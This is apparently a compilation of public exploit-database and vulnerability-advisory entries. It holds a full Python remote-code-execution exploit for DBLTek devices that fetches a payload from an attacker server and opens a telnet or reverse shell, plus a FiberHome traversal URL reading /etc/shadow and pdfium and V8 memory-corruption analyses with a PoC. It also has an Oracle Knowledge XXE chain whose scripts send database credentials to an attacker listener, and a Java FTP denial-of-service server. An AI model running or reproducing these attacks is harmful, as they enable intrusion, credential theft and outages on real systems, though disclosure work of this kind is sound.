Once we have the admin password, we can send a POST request to change_password.csp and trigger the second vulnerability.
User-controlled input is not sufficiently sanitized when passed to change_password.csp. An attacker can inject a script containing malicious commands into a configuration variable and have it executed.
```
POST /default/en_US/change_password.csp
Content-Type: application/x-www-form-urlencoded
Authorization: Basic ###BASE64("admin", ###LEAKED_PASSWORD###)###
level=user&user_level_enable=on&passwd=<%%25call system.exec: ###MALICIOUS_COMMAND###>
```
## Proof of Concept
Unauthenticated Remote Command Execution:
```
#!/usr/bin/python3
from http.server import BaseHTTPRequestHandler, HTTPServer
import os, sys, base64, bz2, socket, argparse, threading, requests, re

PAYLOAD0 = '''#!/bin/sh
rm -f /tmp/y
/bin/busybox telnetd -l /bin/sh -p %d &
'''

PAYLOAD1 = '''#!/bin/sh
rm -f /tmp/y /tmp/p
wget -O /tmp/p http://%s:%d/prism
chmod 755 /tmp/p
/tmp/p
'''


class Handler(BaseHTTPRequestHandler):
    PRISM_PORT = 1337
    TELNET_PORT = 23

    def do_GET(self):
        if self.path == '/0':
            self.send_response(200)
            self.send_header('Content-type', 'text/plain')
            self.end_headers()
            payload = PAYLOAD0 % Handler.TELNET_PORT
            self.wfile.write(payload.encode())
            return
        if self.path == '/1':
            self.send_response(200)
            self.send_header('Content-type', 'text/plain')
            self.end_headers()
            payload = PAYLOAD1 % (Handler.HTTP_ADDR, Handler.HTTP_PORT)
            self.wfile.write(payload.encode())
            return
        if self.path == '/prism':
            self.send_response(200)
            self.send_header('Content-type', 'octet/stream')
            self.end_headers()
            self.wfile.write(prism(Handler.HTTP_ADDR, Handler.PRISM_PORT))
            return
        self.send_response(404)

    def log_message(self, format, *args):
        print(' -- SERVING ' + format % args)


class Server(threading.Thread):
    def __init__(self, addr='0.0.0.0', port=8080):
        threading.Thread.__init__(self)
        Handler.HTTP_ADDR = addr
        Handler.HTTP_PORT = port
        self.httpd = HTTPServer((addr, port), Handler)

    # unused helper; `self` was missing in the original definition
    def set(self, mime, data):
        self.httpd.RequestHandlerClass.mime = mime
        self.httpd.RequestHandlerClass.data = data

    def run(self):
        print(' - Starting server http://%s:%s' % self.httpd.socket.getsockname())
        self.httpd.serve_forever()

    def stop(self):
        print(' - Stopping server')
        self.httpd.shutdown()


def prism(host, port):
    # the ARM binary is embedded as a bz2/base64 blob at the end of this file
    pyfile = open(os.path.realpath(__file__), 'r')
    data, skip = '', True
    for line in pyfile:
        if skip and line != '""" PRISM ARM V5L\n':
            continue
        if line == '"""\n':
            break
        if not skip:
            data += line.strip()
        skip = False
    port = str(port)
    bhost = host.encode() + (b'\0' * (16 - len(host)))
    bport = port.encode() + (b'\0' * ( 6 - len(port)))
    binary = bytearray(bz2.decompress(base64.b64decode(data)))
    binary[0x7810:0x7810+16] = bhost
    binary[0x7820:0x7820+ 6] = bport
    return binary


def getip(host):
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.connect((host, 1337))
    return s.getsockname()[0]


def get(url):
    print(' -- GET %s' % url)
    response = requests.get(url)
    return response.text


def post(url, password, data):
    print(' -- POST %s' % url)
    header = { 'Content-Type': 'application/x-www-form-urlencoded' }
    auth = requests.auth.HTTPBasicAuth('admin', password)
    response = requests.post(url, auth=auth, data=data, headers=header)
    return response.text


def attack_leak(target, variable):
    print(' - Dumping configuration (variable=%s)' % variable)
    config = get('http://%s/default/en_US/frame.html?content=/dev/mtdblock/5' % target)
    m = re.search(r'%s="(.*)"' % variable, config)
    if not m:
        print('Cannot leak variable %s :(' % variable)
        sys.exit(1)
    return m.group(1)


def attack_exec(target, password, command):
    print(' - Executing "%s"' % command)
    argv = ', '.join(command.split())
    data = 'level=user&user_level_enable=on&passwd=<%%25call system.exec: %s>' % argv
    post('http://%s/default/en_US/change_password.csp' % target, password, data)
    get('http://%s/default/en_US/frame.html?content=/dev/mtdblock/5' % target)


# Parsing attacker input
parser = argparse.ArgumentParser(description='DBLTek Unauthenticated Pre-Auth RCE as root', epilog="""
Available modes are:
  1 - Use telnetd on port %d
  2 - Use prism daemon with port %d
""" % (Handler.TELNET_PORT, Handler.PRISM_PORT), formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('-a', '--addr', dest='addr', type=str, default=None, help="http server address")
parser.add_argument('-p', '--port', dest='port', type=int, default=8080, help="http server port (default: 8080)")
parser.add_argument('-m', '--mode', dest='mode', type=int, default=0, help="attack mode (default 0)")
parser.add_argument('target')
args = parser.parse_args(sys.argv[1:])

# Get local address based on target address and routes
myaddr = getip(args.target)
myport = args.port

# Start payload delivery server
server = Server(args.addr or myaddr, myport)
server.start()

try:
    # Leak ADMIN_PASSWORD
    password = attack_leak(args.target, 'ADMIN_PASSWORD')
    print(" -- ADMIN_PASSWORD = '%s'" % password)

    attack_exec(args.target, password, "/bin/wget -O /tmp/y http://%s:%d/%d" % (myaddr, myport, args.mode))
    attack_exec(args.target, password, "/bin/sh /tmp/y")

    print(""" - Use these commands to wipe:
  -- => setsyscfg USER_PASSWORD=
  -- => setsyscfg USER_LEVEL_ENABLE=0""")

    if args.mode == 0:
        print(" - Telnet to %s port %d" % (args.target, Handler.TELNET_PORT))
        os.system("telnet %s %d" % (args.target, Handler.TELNET_PORT))
    if args.mode == 1:
        print(" - Listen on %s:%d (wait 15 seconds at least)" % (myaddr, Handler.PRISM_PORT))
        os.system("nc -l -p %d" % Handler.PRISM_PORT)
except RuntimeError as e:
    print(" - Failed :(")
    pass

# Stop payload delivery server
server.stop()
server.join()

""" PRISM ARM V5L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"""
```

## Vulnerability Summary
The following advisory describes a directory traversal vulnerability found in FiberHome routers.
FiberHome Technologies Group “was established in 1974. After continuous and intensive development for over 40 years, its business has been extended to R&D, manufacturing, marketing & sales, engineering service, in 4 major areas: fiber-optic communications, data networking communications, wireless communication, and intelligentizing applications. In particular, it has been providing end-to-end solutions integrated with opto-electronic devices, optic preforms, fiber & cables, and optical communication systems to many countries around the world.”
## Credit
An independent security researcher has reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.
## Vendor response
Update 1:
CVE issued: CVE-2017-15647
We have tried to contact FiberHome since September 6, 2017; repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for the vulnerability.
## Vulnerability details
User-controlled input is not sufficiently sanitized when passed to /cgi-bin/webproc.
/cgi-bin/webproc takes a getpage= parameter.
When we pass the path of a file in that parameter (together with a var:page parameter), the router returns the file.
## Proof of Concept
```
http://+IP+/cgi-bin/webproc?getpage=/etc/shadow&var:language=en_us&var:page=wizardfifth
```

This vulnerability relies on several minor oversights in the handling of shading patterns in pdfium; I'll try to detail all of the issues that could be fixed to harden the code against similar issues.
The DrawXShading functions in cpdf_renderstatus.cpp rely on a helper function to compute the number of output components resulting from applying multiple shading functions. Note that all of these functions appear to be vulnerable; the rest of this report discusses the specifics of triggering a heap-overflow using DrawRadialShading.
```
uint32_t CountOutputs(
    const std::vector<std::unique_ptr<CPDF_Function>>& funcs) {
  uint32_t total = 0;
  for (const auto& func : funcs) {
    if (func)
      total += func->CountOutputs();  // <-- Issue #1 : integer overflow here
  }
  return total;
}
```
The lack of integer overflow checking would not be an issue if the parser enforced the limitations applied by the PDF specification to the functions used (namely that the /Function section in a radial shading pattern should be either a 1-n function or an array of n 1-1 functions), as these preconditions would preclude any overflow from occurring. However, we can see in the loading code for CPDF_ShadingPattern that there is no such validation.
```
bool CPDF_ShadingPattern::Load() {
  if (m_ShadingType != kInvalidShading)
    return true;

  CPDF_Dictionary* pShadingDict =
      m_pShadingObj ? m_pShadingObj->GetDict() : nullptr;
  if (!pShadingDict)
    return false;

  m_pFunctions.clear();
  CPDF_Object* pFunc = pShadingDict->GetDirectObjectFor("Function");
  if (pFunc) {
    // Issue #2: we never validate that the signatures of the parsed Function object
    // match the expected signatures for the shading type that we're parsing.
    if (CPDF_Array* pArray = pFunc->AsArray()) {
      m_pFunctions.resize(std::min<size_t>(pArray->GetCount(), 4));
      for (size_t i = 0; i < m_pFunctions.size(); ++i)
        m_pFunctions[i] = CPDF_Function::Load(pArray->GetDirectObjectAt(i));
    } else {
      m_pFunctions.push_back(CPDF_Function::Load(pFunc));
    }
  }
  CPDF_Object* pCSObj = pShadingDict->GetDirectObjectFor("ColorSpace");
  if (!pCSObj)
    return false;

  CPDF_DocPageData* pDocPageData = document()->GetPageData();
  m_pCS = pDocPageData->GetColorSpace(pCSObj, nullptr);
  if (m_pCS)
    m_pCountedCS = pDocPageData->FindColorSpacePtr(m_pCS->GetArray());

  m_ShadingType = ToShadingType(pShadingDict->GetIntegerFor("ShadingType"));

  // We expect to have a stream if our shading type is a mesh.
  if (IsMeshShading() && !ToStream(m_pShadingObj.Get()))
    return false;

  return true;
}
```
Assuming that we can create function objects with very large output sizes, we can then reach the following code (in cpdf_renderstatus.cpp) when rendering something using the pattern:
```
void DrawRadialShading(const RetainPtr<CFX_DIBitmap>& pBitmap,
                       CFX_Matrix* pObject2Bitmap,
                       CPDF_Dictionary* pDict,
                       const std::vector<std::unique_ptr<CPDF_Function>>& funcs,
                       CPDF_ColorSpace* pCS,
                       int alpha) {
  // ... snip ...

  uint32_t total_results =
      std::max(CountOutputs(funcs), pCS->CountComponents());
  // NB: CountOutputs overflows here; result_array will be a stack buffer if we
  // return a resulting size less than 16, or a heap buffer if the size is larger.
  CFX_FixedBufGrow<float, 16> result_array(total_results);
  float* pResults = result_array;
  memset(pResults, 0, total_results * sizeof(float));
  uint32_t rgb_array[SHADING_STEPS];
  for (int i = 0; i < SHADING_STEPS; i++) {
    float input = (t_max - t_min) * i / SHADING_STEPS + t_min;
    int offset = 0;
    for (const auto& func : funcs) {
      if (func) {
        int nresults;
        // Here we've desynchronised the size of the memory pointed to by
        // pResults with the actual output size of the functions, so this
        // can write outside the allocated buffer.
        if (func->Call(&input, 1, pResults + offset, &nresults))
          offset += nresults;
      }
    }
    float R = 0.0f;
    float G = 0.0f;
    float B = 0.0f;
    pCS->GetRGB(pResults, &R, &G, &B);
    rgb_array[i] =
        FXARGB_TODIB(FXARGB_MAKE(alpha, FXSYS_round(R * 255),
                                 FXSYS_round(G * 255), FXSYS_round(B * 255)));
  }
```
Now we need to revisit our earlier assumption, that we can create function objects with large output sizes.
The following code handles parsing of function objects:
```
bool CPDF_Function::Init(CPDF_Object* pObj) {
  CPDF_Stream* pStream = pObj->AsStream();
  CPDF_Dictionary* pDict = pStream ? pStream->GetDict() : pObj->AsDictionary();

  CPDF_Array* pDomains = pDict->GetArrayFor("Domain");
  if (!pDomains)
    return false;

  m_nInputs = pDomains->GetCount() / 2;
  if (m_nInputs == 0)
    return false;

  m_pDomains = FX_Alloc2D(float, m_nInputs, 2);
  for (uint32_t i = 0; i < m_nInputs * 2; i++) {
    m_pDomains[i] = pDomains->GetFloatAt(i);
  }

  CPDF_Array* pRanges = pDict->GetArrayFor("Range");
  m_nOutputs = 0;
  if (pRanges) {
    m_nOutputs = pRanges->GetCount() / 2;
    m_pRanges = FX_Alloc2D(float, m_nOutputs, 2);  // <-- avoid this call
    for (uint32_t i = 0; i < m_nOutputs * 2; i++)
      m_pRanges[i] = pRanges->GetFloatAt(i);
  }

  uint32_t old_outputs = m_nOutputs;
  if (!v_Init(pObj))
    return false;

  if (m_pRanges && m_nOutputs > old_outputs) {
    m_pRanges = FX_Realloc(float, m_pRanges, m_nOutputs * 2);  // <-- avoid this call
    if (m_pRanges) {
      memset(m_pRanges + (old_outputs * 2), 0,
             sizeof(float) * (m_nOutputs - old_outputs) * 2);
    }
  }
  return true;
}
```
We can only have 4 functions, so we need m_nOutputs to be pretty large. Ideally we also don't want our pdf file to contain arrays of size 0x100000000 // 4 either, since this will mean multiple-gigabyte pdfs. Note also that any call to the FX_ allocation functions will fail on very large values, so ideally we need to follow the case old_outputs == m_nOutputs == 0, avoiding the final FX_Realloc call and allowing an arbitrarily large m_nOutputs.
It turns out that there is a function subtype that allows this: the exponential interpolation function type implemented in cpdf_expintfunc.cpp.
```
bool CPDF_ExpIntFunc::v_Init(CPDF_Object* pObj) {
  CPDF_Dictionary* pDict = pObj->GetDict();
  if (!pDict)
    return false;

  CPDF_Array* pArray0 = pDict->GetArrayFor("C0");
  if (m_nOutputs == 0) {
    m_nOutputs = 1;
    if (pArray0) {
      fprintf(stderr, "C0 %zu\n", pArray0->GetCount());
      m_nOutputs = pArray0->GetCount();
    }
  }

  CPDF_Array* pArray1 = pDict->GetArrayFor("C1");
  m_pBeginValues = FX_Alloc2D(float, m_nOutputs, 2);
  m_pEndValues = FX_Alloc2D(float, m_nOutputs, 2);
  for (uint32_t i = 0; i < m_nOutputs; i++) {
    m_pBeginValues[i] = pArray0 ? pArray0->GetFloatAt(i) : 0.0f;
    m_pEndValues[i] = pArray1 ? pArray1->GetFloatAt(i) : 1.0f;
  }

  m_Exponent = pDict->GetFloatFor("N");
  m_nOrigOutputs = m_nOutputs;
  if (m_nOutputs && m_nInputs > INT_MAX / m_nOutputs)  // <-- can't be *too* large
    return false;

  m_nOutputs *= m_nInputs;  // <-- but it can be pretty large
  // Issue #3: This is probably not the place, but it probably makes sense to
  // bound m_nInputs and m_nOutputs to some large-but-not-that-large value in
  // CPDF_Function::Init
  return true;
}
```
So, by providing a function object without a /Range entry, but with large /C0 and /Domain arrays, we can construct a function object with about INT_MAX outputs.
```
7 0 obj
<<
  /FunctionType 2
  /Domain [
    0.0 1.0
    ... repeat many times ...
    0.0 1.0
  ]
  /C0 [
    0.0
    ... repeat many times ...
    0.0
  ]
  /N 1
>>
endobj
```
At this point it looks like we have quite an annoying exploitation primitive: we can write a huge amount of data out of bounds, but that data will be calculated as an interpolation between its input coordinates, and it will be a really, really big memory corruption.
It turns out that the point mentioned earlier at Issue #2, about validating the signatures of the functions, is again relevant here. If we look at the callsite in DrawRadialShading we can see that all of the functions are called with a single input parameter, and if we look at the start of CPDF_Function::Call:
```
bool CPDF_Function::Call(float* inputs,
                         uint32_t ninputs,
                         float* results,
                         int* nresults) const {
  if (m_nInputs != ninputs)
    return false;
```
We can see that any attempt to call a function with the wrong number of input parameters will simply fail, letting us control precisely the size and contents of our overflow.
The attached poc will crash under ASAN with the following stack-trace, and without ASAN during the free of the corrupted heap block.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44082.zip

Related to issue 1490.
When parsing ShadingPatterns, the specification says they shouldn't be permitted to have a pattern colorspace as their base colorspace, but this is not validated, leading to out-of-bounds reads when rendering using the malformed shading pattern.
```
bool CPDF_ShadingPattern::Load() {
  // ... snip ...
  CPDF_Object* pCSObj = pShadingDict->GetDirectObjectFor("ColorSpace");
  if (!pCSObj)
    return false;
  // No validation here on the type of colorspace.
  // ... snip ...
  return true;
}
```
If we now look at the code called during rendering of this pattern, we call through DrawFreeGouraudShading (cpdf_renderstatus.cpp), which will call CPDF_MeshStream::ReadVertex for each vertex in the shading pattern, which will call CPDF_MeshStream::ReadColor.
```
std::tuple<float, float, float> CPDF_MeshStream::ReadColor() {
  ASSERT(ShouldCheckBPC(m_type));

  float color_value[kMaxComponents];
  for (uint32_t i = 0; i < m_nComponents; ++i) {
    color_value[i] = m_ColorMin[i] + m_BitStream->GetBits(m_nComponentBits) *
                                         (m_ColorMax[i] - m_ColorMin[i]) /
                                         m_ComponentMax;
  }
  // NB: color_value has only been initialised for the first m_nComponents elements

  float r = 0.0;
  float g = 0.0;
  float b = 0.0;
  if (m_funcs.empty()) {
    m_pCS->GetRGB(color_value, &r, &g, &b);  // <-- we're interested in this call here
    return std::tuple<float, float, float>(r, g, b);
  }
  // ... snip ...
}
```
This call to GetRGB lands in the pattern colorspace:
```
bool CPDF_PatternCS::GetRGB(float* pBuf, float* R, float* G, float* B) const {
  if (m_pBaseCS) {
    ASSERT(m_pBaseCS->GetFamily() != PDFCS_PATTERN);
    PatternValue* pvalue = (PatternValue*)pBuf;
    // pvalue->m_Comps is now pointing 5 dwords into an 8 dword sized buffer, and
    // m_pBaseCS expects to be able to read 8 dwords from it.
    if (m_pBaseCS->GetRGB(pvalue->m_Comps, R, G, B))
      return true;
  }
  *R = 0.75f;
  *G = 0.75f;
  *B = 0.75f;
  return false;
}
```
Originally reported without a 90-day deadline as https://bugs.chromium.org/p/chromium/issues/detail?id=795251, since it wasn't clear that there was an easy way to use the oob-read to leak information in a way that was useful; the deadline was applied as of 15/12 after working out how to use this as an information leak for issue 1489.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44083.zip
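The two pdfium reports above both come down to checks that CPDF_ShadingPattern::Load() never performs. The following is an added, stand-alone model of those checks (it is not pdfium code): an overflow-checked CountOutputs for Issue #1, the function-arity rule from Issue #2, and the pattern-colorspace rejection from the second report. `Function`, `CSFamily` and `MakeFuncs` are hypothetical stand-ins for CPDF_Function and pdfium's colorspace family enum.

```cpp
// Added example, not pdfium code: stand-alone model of the validations the two
// reports above describe. The types below are hypothetical stand-ins for
// CPDF_Function and pdfium's colour-space family enum.
#include <cstdint>
#include <initializer_list>
#include <limits>
#include <memory>
#include <vector>

// Only the arity of a function object matters for these checks.
struct Function {
  uint32_t inputs;
  uint32_t outputs;
  uint32_t CountInputs() const { return inputs; }
  uint32_t CountOutputs() const { return outputs; }
};

// Stand-in for pdfium's colour-space family (PDFCS_PATTERN and friends).
enum class CSFamily { DeviceGray, DeviceRGB, DeviceCMYK, Pattern };

using FuncList = std::vector<std::unique_ptr<Function>>;

// The helper as quoted in the first report: plain uint32_t addition that
// wraps silently once the per-function counts sum past 2^32 (Issue #1).
uint32_t CountOutputsUnchecked(const FuncList& funcs) {
  uint32_t total = 0;
  for (const auto& func : funcs) {
    if (func)
      total += func->CountOutputs();
  }
  return total;
}

// Hardened form: refuses to produce a wrapped sum. Returns false on overflow,
// so the caller never sizes result_array from a bogus total.
bool CountOutputsChecked(const FuncList& funcs, uint32_t* total) {
  uint32_t sum = 0;
  for (const auto& func : funcs) {
    if (!func)
      continue;
    uint32_t n = func->CountOutputs();
    if (n > std::numeric_limits<uint32_t>::max() - sum)
      return false;  // sum + n would wrap
    sum += n;
  }
  *total = sum;
  return true;
}

// Issue #2: an axial/radial shading's /Function must be either one 1-in, n-out
// function or n 1-in, 1-out functions, where n is the colour-space component
// count. Enforcing this at Load() time also guarantees every function accepts
// the single input DrawRadialShading passes to CPDF_Function::Call.
bool ValidateShadingFunctions(const FuncList& funcs, uint32_t cs_components) {
  if (funcs.empty() || cs_components == 0)
    return false;
  for (const auto& func : funcs) {
    if (!func || func->CountInputs() != 1)
      return false;
  }
  if (funcs.size() == 1)
    return funcs[0]->CountOutputs() == cs_components;
  if (funcs.size() != cs_components)
    return false;
  for (const auto& func : funcs) {
    if (func->CountOutputs() != 1)
      return false;
  }
  return true;
}

// Second report: a shading's colour space must not itself be a Pattern space,
// otherwise CPDF_PatternCS::GetRGB reads past the caller's color_value buffer.
bool ValidateShadingColorSpace(CSFamily family) {
  return family != CSFamily::Pattern;
}

// Test helper: build a function list from {inputs, outputs} pairs.
FuncList MakeFuncs(std::initializer_list<Function> arities) {
  FuncList out;
  for (const Function& f : arities)
    out.push_back(std::make_unique<Function>(f));
  return out;
}
```

With four functions each claiming 0x40000000 outputs, the unchecked sum is 0 and the checked variant reports overflow; the same list also fails the arity rule because it is neither one n-out function nor n single-output ones.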

```
/*
Here's a snippet of the method.

    ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
        isolate, captures_length_obj,
        Object::ToLength(isolate, captures_length_obj));
    const int captures_length = PositiveNumberToUint32(*captures_length_obj);
    ...
    if (functional_replace) {
      const int argc =
          has_named_captures ? captures_length + 3 : captures_length + 2;  <<-- (a)
      ScopedVector<Handle<Object>> argv(argc);

      int cursor = 0;
      for (int j = 0; j < captures_length; j++) {
        argv[cursor++] = captures[j];
      }

      // (b)
      argv[cursor++] = handle(Smi::FromInt(position), isolate);
      argv[cursor++] = string;

The variable "captures_length" can be controlled by the user, so an integer overflow may occur at (a) which causes a heap overflow at (b).

PoC:
*/

let cnt = 0;
let reg = /./g;
reg.exec = () => {
  if (cnt++ == 0)
    return {length: 0xfffffffe};

  cnt = 0;
  return null;
};

''.replace(reg, () => {});
```

# SSD Advisory Oracle Knowledge Management XXE Leading to a RCE
## Vulnerability Summary
The following advisory describes an information disclosure vulnerability found in Oracle Knowledge Management version 8.5.1.
By enabling searches across a wide variety of sources, Oracle's InQuira knowledge management products offer simple and convenient ways for users to access knowledge that was once hidden in the myriad systems, applications, and databases used to store enterprise content.
Oracle's products for knowledge management help users find useful knowledge contained in corporate information stores.
## Credit
An independent security researcher, Steven Seeley, has reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.
## Vendor response
Oracle has released patches to address this vulnerability, for more details see: http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html.
## Vulnerability Details
The vulnerable code can be found in /imws/Result.jsp. When called, it can be made to fetch an XML document from a third-party server; if that server is under our control, the XML it serves can reference files present locally on the victim's server.
## Proof of Concept
To exploit the vulnerability, we will run the following 5 steps (the first 2 need to be run in the background):
- 'Malicious' XML External Entity (XXE) server
- Listener for the gopher protocol
- Attacker steals the 'custom.xml' file
- Decrypt/crack the encrypted AES password
- Shell on the machine
[Image: the steps this attack requires and the sequence of events that happen behind the scenes]
## Step 1: set up a 'malicious' XML External Entity (XXE) server
```
x@pluto:~/xxe$ ruby xxeserve.rb -o 0.0.0.0
[2015-02-09 16:03:45] INFO WEBrick 1.3.1
[2015-02-09 16:03:45] INFO ruby 1.9.3 (2013-11-22) [x86_64-linux]
== Sinatra/1.4.5 has taken the stage on 4567 for development with backup from WEBrick
[2015-02-09 16:03:45] INFO WEBrick::HTTPServer#start: pid=18862 port=4567
172.16.77.128 - - [09/Feb/2015:16:04:10 +1100] "GET /xml?f=C:/Oracle/Knowledge/IM/instances/InfoManager/custom.xml HTTP/1.1" 200 173 0.0089
172.16.77.128 - - [09/Feb/2015:16:04:10 AEDT] "GET /xml?f=C:/Oracle/Knowledge/IM/instances/InfoManager/custom.xml HTTP/1.1" 200 173
- -> /xml?f=C:/Oracle/Knowledge/IM/instances/InfoManager/custom.xml
```
## Step 2: set up a listener for the gopher protocol
```
x@pluto:~/xxe$ ./gopher.py
starting up on 0.0.0.0 port 1337
waiting for a connection
connection from ('172.16.77.128', 50746)
(+) The database SID is: jdbc:oracle:thin:@WIN-U94QE7O15KE:1521:IM
(+) The database username is: SYS as SYSDBA
(+) The database password is: VO4+OdJq+LXTkmSdXgvCg37TdK9mKftuz2XFiM9mif4=
```
## Step 3: steal the 'custom.xml' file
```
x@pluto:~/xxe$ ./poc.py
(+) pulling custom.xml for the db password...
(!) Success! please check the gopher.py window!
```
## Step 4: decrypt/crack the encrypted AES password
NOTE: you will need to brute-force the encryption key, which is contained in the wallet.
Oracle Knowledge uses 'OracleKnowledge1' as the wallet/keystore password, but you will most likely not have the wallet or keystore, in which case a dictionary attack is to be used to find the password.
```
x@pluto:~/xxe$ ./decrypt.sh VO4+OdJq+LXTkmSdXgvCg37TdK9mKftuz2XFiM9mif4=
(+) Decrypting... "VO4+OdJq+LXTkmSdXgvCg37TdK9mKftuz2XFiM9mif4="
Result: "password"
```
## Step 5: get a shell
Using the database information, login to the database remotely and execute code. You may also find another configuration file on the system that will allow you a more 'direct' way to obtain a SYSTEM shell.
### xxeserve.rb
```
#!/usr/bin/env ruby
# Notes:
# - This is the out of band xxe server that is used to retrieve the file and send it via the gopher protocol
# - ruby xxeserve.rb -o 0.0.0.0
require 'sinatra'

get "/" do
  return "OHAI" if params[:p].nil?
  f = File.open("./files/#{request.ip}#{Time.now.to_i}","w")
  f.write(params[:p])
  f.close
  ""
end

get "/xml" do
  return "" if params[:f].nil?
  <<END
<!ENTITY % payl SYSTEM "file:///#{params[:f]}">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'gopher://#{request.host}:1337/?%payl;'>">
END
end
```
### gopher.py
```
#!/usr/bin/python
# Notes:
# - This code just listens for client requests on port 1337
# - it looks for database strings and prints them out
import socket
import sys
import re

# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Bind the socket to the port
server_address = ('0.0.0.0', 1337)
print >>sys.stderr, 'starting up on %s port %s' % server_address
sock.bind(server_address)

# Listen for incoming connections
sock.listen(1)

while True:
    # Wait for a connection
    print >>sys.stderr, 'waiting for a connection'
    connection, client_address = sock.accept()
    try:
        print >>sys.stderr, 'connection from', client_address

        # Receive the data in small chunks and retransmit it
        while True:
            data = connection.recv(2048)
            if data:
                #print data
                matchuser = re.search("<user>(.*)</user>", data)
                matchpassword = re.search("<password>(.*)</password>", data)
                matchurl = re.search("<url>(.*)</url>", data)
                if matchuser and matchpassword and matchurl:
                    print "(+) The database SID is: %s" % matchurl.group(1)
                    print "(+) The database username is: %s" % matchuser.group(1)
                    print "(+) The database password is: %s" % matchpassword.group(1)
                    connection.close()
                    sys.exit(1)
                connection.close()
                sys.exit(1)
            else:
                print >>sys.stderr, 'no more data from', client_address
                break
    except Exception:
        connection.close()
    finally:
        # Clean up the connection
        connection.close()
```
### poc.py
```
#!/usr/bin/python
# Notes:
# - This code steals the C:/Oracle/Knowledge/IM/instances/InfoManager/custom.xml file via the XXE bug.
# - You need to run ruby xxeserve.rb -o 0.0.0.0 and use an interface ip for the "local xxe server"
# - The code requires a proxy server to be setup on 127.0.0.1:8080 although, this can be changed
import requests
import json
import sys

# burp, ftw
proxies = {
    "http": "http://127.0.0.1:8080",
}

if len(sys.argv) < 3:
    print "(+) Usage: %s [local xxe server:port] [target]" % sys.argv[0]
    print "(+) Example: %s 172.16.77.1:4567 172.16.77.128" % sys.argv[0]
    sys.exit(1)

localxxeserver = sys.argv[1]
target = sys.argv[2]

payload = {'method' : '2', 'inputXml': '''<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY %% remote SYSTEM "http://%s/xml?f=C:/Oracle/Knowledge/IM/instances/InfoManager/custom.xml">
%%remote;
%%int;
%%trick;]>''' % localxxeserver}

url = 'http://%s:8226/imws/Result.jsp' % target
headers = {'content-type': 'application/x-www-form-urlencoded'}

print "(+) pulling custom.xml for the db password..."
r = requests.post(url, data=payload, headers=headers, proxies=proxies)
if r.status_code == 200:
    print "(!) Success! please check the gopher.py window!"
```
### decrypt.sh
```
#!/bin/sh
if [ "$#" -ne 1 ]; then
    echo "(!) Usage: $0 [hash]"
else
    java -classpath "infra_encryption.jar:oraclepki.jar:osdt_core.jar:osdt_cert.jar:commons-codec-1.3.jar" -DKEYSTORE_LOCATION="keystore" com.inquira.infra.security.OKResourceEncryption $1
fi
```
## CVE Details
CVE-2016-3542
## Affected Products
Oracle Knowledge Management versions 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4, and 12.2.5.

exploits/php/dos/44057.md
## Vulnerabilities Summary
The following advisory describes two (2) vulnerabilities found in Oracle Java JDK/JRE (1.8.0.131 and previous versions) packages and Apache Xerces (2.11.0).
The vulnerabilities are:
- Oracle JDK/JRE Concurrency-Related Denial of Service
- java.net.URLConnection (with no setConnectTimeout) Concurrency-Related Denial of Service
## Credit
An independent security researcher has reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.
## Vendor response
Update 1: Oracle has released patches to address this vulnerability and assigned CVE-2017-10355
Oracle acknowledged receiving the report, and has assigned it a tracking number: S0876966. We have no further information on patch availability or a workaround.
## Vulnerabilities Details
These two vulnerabilities can be triggered to cause a Denial of Service against a server under the following conditions:
- An attacker can pass a URL parameter to the target that points to an FTP server under the attacker's control
- The target server uses the vulnerable component(s) to fetch the resource specified by the attacker
- The target server does not prevent fetching of FTP URI resources
In both vulnerabilities, the attack sequence is the following:
1. The attacker forces the vulnerable target server to parse an FTP URL which points to the attacker's FTP server
2. The target server fetches the FTP resource provided by the attacker
3. The attacker's FTP server abruptly exits, leaving the Java process on the target server with two internal threads in an infinite waiting state
4. If the Java process is single-threaded, it cannot process any other client requests, so a Denial of Service condition is reached with only one request from the attacker
5. If the process is multi-threaded, the same technique can reach a Denial of Service condition for all available threads, by issuing one request for each available thread
The attacker-controlled FTP server has to “abruptly” exit when the Java client performs a RETR FTP command. This behavior is not properly handled and causes a thread concurrency Denial of Service.
For example:
```ruby
require 'socket'

# The advisory's PoC FTP server: it greets each client, answers USER with 331
# and every other command with 230, and terminates the whole process on the
# sixth non-USER command, i.e. mid-session, as described above.
ftp_server = TCPServer.new 21
Thread.start do
  loop do
    Thread.start(ftp_server.accept) do |ftp_client|
      puts "FTP. New client connected"
      ftp_client.puts("220 ftp-server")
      counter = 0
      loop {
        req = ftp_client.gets()
        break if req.nil?
        puts "< " + req
        if req.include? "USER"
          ftp_client.puts("331 password")
        else
          ftp_client.puts("230 Waiting data")
          counter = counter + 1
          if counter == 6
            abort
          end
        end
      }
      puts "Aborted..."
    end
  end
end
loop do
  sleep(50000)
end
```
When triggered, the DoS will result in a CLOSE_WAIT status on the connection between the target server and the FTP server (192.168.234.134), leaving the Java process thread stuck.
Oracle JDK/JRE Concurrency-Related Denial of Service
The vulnerable functions are:
- java.io.InputStream
- javax.xml.ws.Service
- javax.xml.validation.Schema
- javax.xml.JAXBContext
- java.net.JarURLConnection (setConnectTimeout and setReadTimeout are ignored)
- javax.imageio.ImageIO
- javax.swing.ImageIcon
- javax.swing.text.html.StyleSheet
## java.io.InputStream Proof of Concept
```java
import java.io.InputStream;
import java.net.URL;

public class RandomAccess {
    public static void main(String[] args) {
        try {
            URL url = new URL("ftp://maliciousftp:2121/test.xml");
            InputStream inputStream = url.openStream();
            inputStream.read();
            //urlc.setReadTimeout(5000);
            //urlc.setConnectTimeout(5000); // <- this fixes the bug
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```
## javax.xml.ws.Service Proof of Concept
```java
import java.net.MalformedURLException;
import java.net.URL;
